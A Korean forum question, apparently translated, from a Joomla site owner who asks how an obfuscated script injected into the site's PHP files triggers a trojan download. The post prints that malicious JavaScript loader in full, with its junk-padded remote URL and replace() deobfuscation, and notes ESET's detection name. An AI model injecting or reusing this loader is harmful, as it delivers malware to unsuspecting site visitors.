내 Joomla! 웹 사이트가 반복적으로 해킹당했습니다. 누군가 어떻게 든 다음과 같은 쓰레기를 주요 PHP 스크립트에 주입했지만 Joomla를 구성하는 것에 대해 이야기하지는 않습니다. 사이트는 많이 방문하지 않았고 (때로는 내가 그 사이트의 유일한 방문자일지도 모른다는 두려움이 있습니다 ...) 사이트를 백업하고 실행하는 데별로 신경 쓰지 않습니다. 결국 처리하겠습니다.
제 질문은이 쓰레기는 어떻게 작동합니까? 나는 그것을 보았고 이것이 어떻게 해를 끼칠 수 있는지 보지 못합니까? 그것이하는 일은 트로이 목마에 감염된 ChangeLog.pdf라는 PDF 파일을 다운로드하려고 시도하는 것입니다.이 파일은 트로이 목마에 감염된 후 열면 Acrobat이 동결되고 컴퓨터에 큰 피해를줍니다. 어떻게 그럴까요, 모르겠어요, 상관 없어요. 그러나 다음 스크립트는 어떻게 다운로드를 호출합니까?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET 에서이 코드를 JS / TrojanDownloader.Agent.NRO 트로이 목마 로 감지했습니다.